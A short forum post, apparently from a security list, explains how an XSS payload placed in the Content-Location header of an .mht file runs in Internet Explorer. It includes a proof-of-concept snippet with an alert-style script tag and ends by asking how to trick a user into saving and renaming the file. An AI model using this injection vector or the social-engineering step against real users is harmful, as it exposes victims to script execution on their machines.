Hi there, It works because there is "Content-Location" header in .mht file so our malicious code will be there. "Content-Location" is outside <html></html> so it will work only in IE (with .htm extension ofcourse). Example code of .mht file with XSS: [...] Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: quoted-printable Content-Location: http://localhost/test/index.php?--><script>alert("XSS")</script> =EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML = xmlns=3D"http://www.w3.org/1999/xhtml";> [...] </HTML> Question is: How to convince user to sava our page on his hdd and change extension to .html? Regards
